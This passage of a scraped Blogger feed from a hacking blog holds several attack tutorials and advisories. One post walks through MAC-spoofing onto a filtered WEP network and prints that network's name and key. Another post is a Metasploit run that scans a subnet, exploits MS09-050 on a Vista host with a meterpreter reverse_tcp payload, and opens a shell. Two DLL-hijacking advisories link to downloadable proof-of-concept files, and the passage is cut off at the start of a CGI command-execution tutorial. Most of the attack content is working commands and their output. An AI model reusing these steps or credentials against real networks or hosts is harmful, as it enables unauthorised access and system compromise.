alt=""id="BLOGGER_PHOTO_ID_5625746971673094802" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;access point filter mac address! only client mac address can connect to it.&lt;br /&gt;so the solution is use client mac address! ^_^&lt;br /&gt;if you remember client mac then change u'r mac with client mac.&lt;br /&gt;&lt;br /&gt;what is client mac address?&lt;br /&gt;client mac address is the mac address that u're spoofing with aireplay-ng.&lt;br /&gt;aireplay-ng -3 -b &lt;bssid&gt; -h &lt;client mac add&gt; &lt;interface&gt;&lt;br /&gt;&lt;br /&gt;i forgot client mac address.. -___-&lt;br /&gt;if u start capture replies there is 4 file created.&lt;br /&gt;&lt;br /&gt;-rw-r--r--  1 root root  86179840 2011-07-03 01:08 qwe-01.cap&lt;br /&gt;-rw-r--r--  1 root root       769 2011-07-03 01:08 qwe-01.csv&lt;br /&gt;-rw-r--r--  1 root root       591 2011-07-03 01:08 qwe-01.kismet.csv&lt;br /&gt;-rw-r--r--  1 root root      5711 2011-07-03 01:08 qwe-01.kismet.netxml&lt;br /&gt;&lt;br /&gt;now search client mac address in qwe-01.kismet.netxml file.&lt;br /&gt;find a client with big packet.&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# cat qwe-01.kismet.netxml&lt;br /&gt;---cut---&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-6_6aQ9BXkrw/ThPkwct1s8I/AAAAAAAAAGk/GlxQVYVBy00/s1600/mac.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 140px;" src="http://4.bp.blogspot.com/-6_6aQ9BXkrw/ThPkwct1s8I/AAAAAAAAAGk/GlxQVYVBy00/s320/mac.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5626091880509191106" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;---cut---&lt;br /&gt;&lt;br /&gt;the packet is big enough &lt;total&gt;69983&lt;/total&gt;&lt;br /&gt;yey!! i found my client &lt;client-mac&gt;4C:0F:6E:60:25:AC&lt;/client-mac&gt;.. :))&lt;br /&gt;&lt;br /&gt;see u'r interface..&lt;br /&gt;my interface is wlan3 and my default mac address is 00:1d:7e:09:6b:0a.&lt;br /&gt;we need to change default mac &lt;00:1d:7e:09:6b:0a&gt; with client mac &lt;4C:0F:6E:60:25:AC&gt;&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# ifconfig wlan3&lt;br /&gt;wlan3     Link encap:Ethernet  HWaddr 00:1d:7e:09:6b:0a  &lt;br /&gt;          inet6 addr: fe80::21d:7eff:fe09:6b0a/64 Scope:Link&lt;br /&gt;          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;          TX packets:15 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;          collisions:0 txqueuelen:1000 &lt;br /&gt;          RX bytes:0 (0.0 B)  TX bytes:3816 (3.8 KB)&lt;br /&gt;&lt;br /&gt;if we run iwconfig we can see no connection there.&lt;br /&gt;Access Point: Not-Associated&lt;br /&gt;Encryption key:off&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# iwconfig wlan3&lt;br /&gt;wlan3     IEEE 802.11bg  Mode:Managed  Frequency:2.457 GHz  &lt;br /&gt;          Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;          Retry  long limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;          Encryption key:off&lt;br /&gt;          Power Management:on&lt;br /&gt;          Link Quality:0  Signal level:0  Noise level:0&lt;br /&gt;          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;&lt;br /&gt;let's change our mac!&lt;br /&gt;&lt;br /&gt;first i'll set my interface down so i can change the mac address.&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# ifconfig wlan3 down&lt;br /&gt;&lt;br /&gt;now change the mac with macchanger.&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# macchanger -m 4C:0F:6E:60:25:AC wlan3&lt;br /&gt;Current MAC: 00:1d:7e:09:6b:0a (unknown)&lt;br /&gt;Faked MAC:   4c:0f:6e:60:25:ac (unknown)&lt;br /&gt;&lt;br /&gt;bring it up again..&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# ifconfig wlan3 up&lt;br /&gt;&lt;br /&gt;as u can see below my mac address has change 4c:0f:6e:60:25:ac.&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# ifconfig wlan3&lt;br /&gt;wlan3     Link encap:Ethernet  HWaddr 4c:0f:6e:60:25:ac  &lt;br /&gt;          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;          TX packets:15 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;          collisions:0 txqueuelen:1000 &lt;br /&gt;          RX bytes:0 (0.0 B)  TX bytes:3816 (3.8 KB)&lt;br /&gt;&lt;br /&gt;now try to connect with the access point.&lt;br /&gt;walla!! its connected.. ^___^&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-_Rx1Be2XlxE/ThKrYWgLK-I/AAAAAAAAAGU/0LQblwxQE-Y/s1600/konek.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 81px;" src="http://1.bp.blogspot.com/-_Rx1Be2XlxE/ThKrYWgLK-I/AAAAAAAAAGU/0LQblwxQE-Y/s320/konek.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5625747319384910818" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ESSID:"Aloysius-NET"&lt;br /&gt;Access Point: 00:02:6F:54:04:75&lt;br /&gt;Encryption key:0987-6123-45&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# iwconfig wlan3&lt;br /&gt;wlan3     IEEE 802.11bg  ESSID:"Aloysius-NET"  &lt;br /&gt;          Mode:Managed  Frequency:2.462 GHz  Access Point: 00:02:6F:54:04:75   &lt;br /&gt;          Bit Rate=1 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;          Retry  long limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;          Encryption key:0987-6123-45&lt;br /&gt;          Power Management:on&lt;br /&gt;          Link Quality=40/70  Signal level=-70 dBm  &lt;br /&gt;          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;&lt;br /&gt;ping test..&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# ping antisecurity.org&lt;br /&gt;PING antisecurity.org (168.144.82.176) 56(84) bytes of data.&lt;br /&gt;64 bytes from 168.144.82.176: icmp_seq=1 ttl=56 time=740 ms&lt;br /&gt;64 bytes from 168.144.82.176: icmp_seq=2 ttl=56 time=1082 ms&lt;br /&gt;64 bytes from 168.144.82.176: icmp_seq=3 ttl=56 time=778 ms&lt;br /&gt;64 bytes from 168.144.82.176: icmp_seq=4 ttl=56 time=797 ms&lt;br /&gt;64 bytes from 168.144.82.176: icmp_seq=6 ttl=56 time=711 ms&lt;br /&gt;^Z&lt;br /&gt;[8]+  Stopped                 ping antisecurity.org&lt;br /&gt;root@evilc0de:/home/noge# &lt;br /&gt;&lt;br /&gt;so if you have WEP key but can't connect to the access point, try change u'r mac with client mac.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;big thanks to bob and array&lt;br /&gt;salam from papua.. :)&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8220167865173302483?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8220167865173302483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8220167865173302483' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8220167865173302483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8220167865173302483'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/wep-key-problem-solved.html' title='WEP key problem [SOLVED]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-VbgVzctF-jA/ThKqg8YVwgI/AAAAAAAAAGE/vcYdK8r1BhM/s72-c/key.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-76009574653050779</id><published>2011-01-18T19:58:00.002+07:00</published><updated>2011-01-18T20:07:08.534+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>Howdy!!</title><content type='html'>hey ya all...&lt;br /&gt;&lt;br /&gt;i know its to late but HAPPY NEW YEAR to u... ^_____^&lt;br /&gt;&lt;br /&gt;its been more then 3 month since my last post. lol&lt;br /&gt;some video tutorial link are dead coz my host where i put all videos is suspended. :p&lt;br /&gt;im sorry about that!!&lt;br /&gt;i will upload the videos and update this blog again ASAP.&lt;br /&gt;&lt;br /&gt;be save... :))&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-76009574653050779?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/76009574653050779/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=76009574653050779' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/76009574653050779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/76009574653050779'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/01/howdy.html' title='Howdy!!'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-9208354767472599429</id><published>2010-09-22T02:48:00.003+07:00</published><updated>2010-09-22T02:57:20.841+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Exploiting Vista SP1 with SMB2 [metasploit]</title><content type='html'>[o] Exploiting Vista SP1 with SMB2 [metasploit]&lt;br /&gt;[o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;root@evilc0de:~# msfconsole&lt;br /&gt;&lt;br /&gt;&lt;&gt;&lt;br /&gt; ------------&lt;br /&gt;       \   ,__,&lt;br /&gt;        \  (oo)____&lt;br /&gt;           (__)    )\&lt;br /&gt;              ||--|| *&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]&lt;br /&gt;+ -- --=[ 590 exploits - 302 auxiliary&lt;br /&gt;+ -- --=[ 224 payloads - 27 encoders - 8 nops&lt;br /&gt;       =[ svn r10414 updated today (2010.09.21)&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;msf &gt; use scanner/smb/smb_version&lt;br /&gt;msf auxiliary(smb_version) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;   Name       Current Setting  Required  Description&lt;br /&gt;   ----       ---------------  --------  -----------&lt;br /&gt;   RHOSTS                      yes       The target address range or CIDR identifier&lt;br /&gt;   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication&lt;br /&gt;   SMBPass                     no        The password for the specified username&lt;br /&gt;   SMBUser                     no        The username to authenticate as&lt;br /&gt;   THREADS    1                yes       The number of concurrent threads&lt;br /&gt;&lt;br /&gt;msf auxiliary(smb_version) &gt; set RHOSTS 172.16.0.1-172.16.4.255&lt;br /&gt;RHOSTS =&gt; 172.16.0.1-172.16.4.255&lt;br /&gt;msf auxiliary(smb_version) &gt; set THREADS 50&lt;br /&gt;THREADS =&gt; 50&lt;br /&gt;msf auxiliary(smb_version) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;   Name       Current Setting          Required  Description&lt;br /&gt;   ----       ---------------          --------  -----------&lt;br /&gt;   RHOSTS     172.16.0.1-172.16.4.255  yes       The target address range or CIDR identifier&lt;br /&gt;   SMBDomain  WORKGROUP                no        The Windows domain to use for authentication&lt;br /&gt;   SMBPass                             no        The password for the specified username&lt;br /&gt;   SMBUser                             no        The username to authenticate as&lt;br /&gt;   THREADS    50                       yes       The number of concurrent threads&lt;br /&gt;&lt;br /&gt;msf auxiliary(smb_version) &gt; run&lt;br /&gt;&lt;br /&gt;[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)&lt;br /&gt;[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)&lt;br /&gt;[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)&lt;br /&gt;[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)&lt;br /&gt;&lt;br /&gt;msf auxiliary(smb_version) &gt; use windows/smb/ms09_050_smb2_negotiate_func_index&lt;br /&gt;msf exploit(ms09_050_smb2_negotiate_func_index) &gt; info&lt;br /&gt;&lt;br /&gt;       Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference&lt;br /&gt;    Version: 9669&lt;br /&gt;   Platform: Windows&lt;br /&gt; Privileged: Yes&lt;br /&gt;    License: Metasploit Framework License (BSD)&lt;br /&gt;       Rank: Good&lt;br /&gt;&lt;br /&gt;Provided by:&lt;br /&gt;  laurent.gaffie &lt;laurent.gaffie@gmail.com&gt;&lt;br /&gt;  hdm &lt;hdm@metasploit.com&gt;&lt;br /&gt;  sf &lt;stephen_fewer@harmonysecurity.com&gt;&lt;br /&gt;&lt;br /&gt;Available targets:&lt;br /&gt;  Id  Name&lt;br /&gt;  --  ----&lt;br /&gt;  0   Windows Vista SP1/SP2 and Server 2008 (x86)&lt;br /&gt;&lt;br /&gt;Basic options:&lt;br /&gt;  Name   Current Setting  Required  Description&lt;br /&gt;  ----   ---------------  --------  -----------&lt;br /&gt;  RHOST                 yes       The target address&lt;br /&gt;  RPORT  445              yes       The target port&lt;br /&gt;  WAIT   180              yes       The number of seconds to wait for the attack to complete.&lt;br /&gt;&lt;br /&gt;Payload information:&lt;br /&gt;  Space: 1024&lt;br /&gt;&lt;br /&gt;Description:&lt;br /&gt;  This module exploits an out of bounds function table dereference in&lt;br /&gt;  the SMB request validation code of the SRV2.SYS driver included with&lt;br /&gt;  Windows Vista, Windows 7 release candidates (not RTM), and Windows&lt;br /&gt;  2008 Server prior to R2. Windows Vista without SP1 does not seem&lt;br /&gt;  affected by this flaw.&lt;br /&gt;&lt;br /&gt;References:&lt;br /&gt;  http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx&lt;br /&gt;  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103&lt;br /&gt;  http://www.securityfocus.com/bid/36299&lt;br /&gt;  http://www.osvdb.org/57799&lt;br /&gt;  http://seclists.org/fulldisclosure/2009/Sep/0039.html&lt;br /&gt;  http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx&lt;br /&gt;&lt;br /&gt;msf exploit(ms09_050_smb2_negotiate_func_index) &gt; set payload windows/meterpreter/reverse_tcp&lt;br /&gt;payload =&gt; windows/meterpreter/reverse_tcp&lt;br /&gt;msf exploit(ms09_050_smb2_negotiate_func_index) &gt; set RHOST 172.16.1.138&lt;br /&gt;RHOST =&gt; 172.16.1.138&lt;br /&gt;msf exploit(ms09_050_smb2_negotiate_func_index) &gt; set LHOST 172.16.1.12&lt;br /&gt;LHOST =&gt; 172.16.1.12&lt;br /&gt;msf exploit(ms09_050_smb2_negotiate_func_index) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;   Name   Current Setting  Required  Description&lt;br /&gt;   ----   ---------------  --------  -----------&lt;br /&gt;   RHOST  172.16.1.138     yes       The target address&lt;br /&gt;   RPORT  445              yes       The target port&lt;br /&gt;   WAIT   180              yes       The number of seconds to wait for the attack to complete.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Payload options (windows/meterpreter/reverse_tcp):&lt;br /&gt;&lt;br /&gt;   Name      Current Setting  Required  Description&lt;br /&gt;   ----      ---------------  --------  -----------&lt;br /&gt;   EXITFUNC  thread           yes       Exit technique: seh, thread, process&lt;br /&gt;   LHOST     172.16.1.12      yes       The listen address&lt;br /&gt;   LPORT     4444             yes       The listen port&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploit target:&lt;br /&gt;&lt;br /&gt;   Id  Name&lt;br /&gt;   --  ----&lt;br /&gt;   0   Windows Vista SP1/SP2 and Server 2008 (x86)&lt;br /&gt;&lt;br /&gt;msf exploit(ms09_050_smb2_negotiate_func_index) &gt; exploit&lt;br /&gt;&lt;br /&gt;[*] Started reverse handler on 172.16.1.12:4444&lt;br /&gt;[*] Connecting to the target (172.16.1.138:445)...&lt;br /&gt;[*] Sending the exploit packet (872 bytes)...&lt;br /&gt;[*] Waiting up to 180 seconds for exploit to trigger...&lt;br /&gt;[*] Sending stage (748544 bytes) to 172.16.1.138&lt;br /&gt;[*] Meterpreter session 1 opened (172.16.1.12:4444 -&gt; 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700&lt;br /&gt;&lt;br /&gt;meterpreter &gt; sysinfo&lt;br /&gt;Computer: PUPEN-SNOWBLACK&lt;br /&gt;OS      : Windows Vista (Build 6001, Service Pack 1).&lt;br /&gt;Arch    : x86&lt;br /&gt;Language: en_US&lt;br /&gt;&lt;br /&gt;meterpreter &gt; shell&lt;br /&gt;Process 1240 created.&lt;br /&gt;Channel 1 created.&lt;br /&gt;Microsoft Windows [Version 6.0.6001]&lt;br /&gt;Copyright (c) 2006 Microsoft Corporation.  All rights reserved.&lt;br /&gt;&lt;br /&gt;C:\Windows\system32&gt;net user&lt;br /&gt;net user&lt;br /&gt;&lt;br /&gt;User accounts for \\&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------&lt;br /&gt;Administrator            Aulia                    Guest                   &lt;br /&gt;laptop                  &lt;br /&gt;The command completed with one or more errors.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C:\Windows\system32&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-9208354767472599429?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/9208354767472599429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=9208354767472599429' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/9208354767472599429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/9208354767472599429'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/09/exploiting-vista-sp1-with-smb2.html' title='Exploiting Vista SP1 with SMB2 [metasploit]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6325857377240027597</id><published>2010-09-21T11:15:00.002+07:00</published><updated>2010-09-21T11:18:13.901+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Fotobook Editor 5.0 DLL Hijacking Vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;[o] Fotobook Editor 5.0 DLL Hijacking Vulnerability&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;Software : Fotobook Editor 5.0 version 2.8.0.1 (CCPublisher.exe)&lt;br /&gt;Vendor   : http://www.fotobook.co.uk/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable DLL&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;fwpuclnt.dll&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Extension&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;.dtp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://antisecurity.org/sploit/fotobook_dll.zip&lt;br /&gt;http://www.packetstormsecurity.org/1009-exploits/fotobook-dllhijack.tgz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Usage&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;+ Unzip &lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;fotobook&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;_dll.zip&lt;br /&gt;+ Double click exploit.kcp or open with KinetiCount.exe&lt;br /&gt;+ You will see calc pop up&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Tested On &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Microsoft Windows XP Professional&lt;br /&gt;Version 5.1.2600 Service Pack 2 Build 2600&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6325857377240027597?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6325857377240027597/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6325857377240027597' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6325857377240027597'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6325857377240027597'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/09/fotobook-editor-50-dll-hijacking.html' title='Fotobook Editor 5.0 DLL Hijacking Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8055399901079921947</id><published>2010-09-21T11:05:00.002+07:00</published><updated>2010-09-21T11:13:57.635+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Kineti Count DLL Hijacking Vulnerability</title><content type='html'>&lt;span style="font-weight: bold;"&gt;[o] Kineti Count DLL Hijacking Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : Kineti Count version 1.0 Beta (KinetiCount.exe)&lt;br /&gt;Vendor   : http://www.kineticstorm.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable DLL&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;dwmapi.dll&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Extension&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;.kcp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://antisecurity.org/sploit/kineticount_dll.zip&lt;br /&gt;http://www.packetstormsecurity.org/1009-exploits/kineticount-dllhijack.tgz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Usage&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;+ Unzip kineticount_dll.zip&lt;br /&gt;+ Double click exploit.kcp or open with KinetiCount.exe&lt;br /&gt;+ You will see calc pop up&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Tested On &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Microsoft Windows XP Professional&lt;br /&gt;Version 5.1.2600 Service Pack 2 Build 2600&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8055399901079921947?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8055399901079921947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8055399901079921947' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8055399901079921947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8055399901079921947'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/09/kineti-count-dll-hijacking.html' title='Kineti Count DLL Hijacking Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2860199223929012565</id><published>2010-09-20T13:16:00.003+07:00</published><updated>2010-09-20T13:26:37.487+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Remote Command Execute [at] CGI Script [video]</title><content type='html'>The Common Gateway Interface (CGI) is a standard protocol that defines  how webserver software can delegate the generation of webpages to a  console application. Such applications are known as CGI scripts; they  can be written in any programming language, although scripting languages  are often used.&lt;br /&gt;A CGI script is a program written in one of several popular languages  such as Perl, PHP, Python, etc. that can pass data between a web page  and programs on the web server. CGI scripts are widely used to process  forms such as search boxes.&lt;br /&gt;&lt;br /&gt;This is an old school stuff but some web still vuln with this..&lt;br /&gt;&lt;br /&gt;Have fun!!&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="simpara"&gt;&lt;span class="fullpost"&gt;watch the video &lt;a 